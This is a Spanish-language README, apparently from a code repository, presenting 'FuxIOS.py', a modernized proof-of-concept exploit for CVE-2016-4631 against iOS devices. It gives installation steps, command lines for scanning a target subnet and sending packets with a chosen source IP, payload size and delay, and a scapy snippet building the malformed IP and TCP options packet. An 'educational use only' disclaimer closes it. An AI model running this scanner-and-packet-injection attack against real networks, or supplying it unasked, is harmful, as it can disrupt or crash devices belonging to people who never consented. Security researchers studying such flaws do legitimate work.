
PoC de exploit modernizado en Python 3 para CVE-2016-4631 dirigido a dispositivos iOS. Incluye escaneo de red, generación de payloads IP/TCP malformados e inyección de paquetes para pruebas de seguridad autorizadas y fines educativos.
¿Por qué publico esto ahora?
Mientras revisaba viejos discos duros y repositorios olvidados, me encontré con este script que escribí hace años cuando apenas comenzaba mi carrera en ciberseguridad. Era una época diferente - Python 2.7 dominaba, las vulnerabilidades como CVE-2016-4631 eran el pan de cada día, y cada PoC que funcionaba se sentía como una pequeña victoria.
Al ver este código después de tanto tiempo, no pude evitar sentir nostalgia. Recordé esas noches depurando exploits, la emoción de ver "Payload sent successfully", y cómo cada script era un paso más en mi aprendizaje. Aunque hoy en día trabajo con tecnologías mucho más avanzadas, este pequeño script representa esos primeros pasos en el mundo de la seguridad ofensiva.
Decidí modernizarlo y subirlo no solo por nostalgia, sino porque creo que puede ser útil para otros que están comenzando su camino en ciberseguridad. Es un recordatorio de que todos empezamos en algún lugar, y que esos primeros scripts "simples" son la base de todo lo que viene después.
F0LloW_Th3_R4ts era mi firma de entonces... algunos códigos nunca se olvidan. 🐀
- BONKERS, Julio 2025
FuxIOS.py es un Proof of Concept (PoC) actualizado para la vulnerabilidad CVE-2016-4631 que afecta a dispositivos iOS. Esta versión ha sido completamente reescrita y modernizada para Python 3 con mejoras significativas en funcionalidad, seguridad y usabilidad.
list_of_ips → list_ips# Instalar nmap (requerido por python-nmap)
# Windows: Descargar desde https://nmap.org/download.html
# Linux: sudo apt-get install nmap
# macOS: brew install nmap
# Clonar repositorio
git clone <repo-url>
cd FuxiOS
# Instalar dependencias
pip install -r requirements.txt
# O manualmente:
pip install scapy python-nmap
# Uso básico
sudo python3 FuxIOS.py
# Configuración personalizada
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24
# Opciones avanzadas
sudo python3 FuxIOS.py -s 192.168.1.100 -n 192.168.1.0/24 -m 50 -d 0.1
# Ver ayuda
python3 FuxIOS.py -h
sudo python3 FuxIOS.py --interactive
-s, --source: IP origen del ataque (default: 192.168.1.95)-n, --network: Subred objetivo (default: 192.168.1.0/24)-m, --max-payload: Tamaño máximo del payload (default: 40)-d, --delay: Retraso entre paquetes en segundos (default: 0.2)--interactive: Modo interactivo para compatibilidad# Paquete malicioso
IP(src=source_ip, dst=target_ip, options=malformed_payload) /
TCP(dport=80, flags="S", options=[(19, b"x"*18), (19, b"x"*18)])
Este tool debe utilizarse exclusivamente para:
Los logs se guardan en fuxios_exploit.log e incluyen:
Error: "No module named 'scapy'"
pip install scapy
Error: "No module named 'nmap'"
pip install python-nmap
# Y asegúrate de tener nmap instalado en el sistema
Error: "Permission denied"
# Linux/macOS
sudo python3 FuxIOS.py
# Windows
# Ejecutar PowerShell/CMD como administrador
Windows: "WinPcap/Npcap not found"
Este proyecto es solo para fines educativos. El autor no se hace responsable del mal uso de esta herramienta.
Recuerda: "F0LloW_Th3_R4ts <:8)~~ <:8)~~"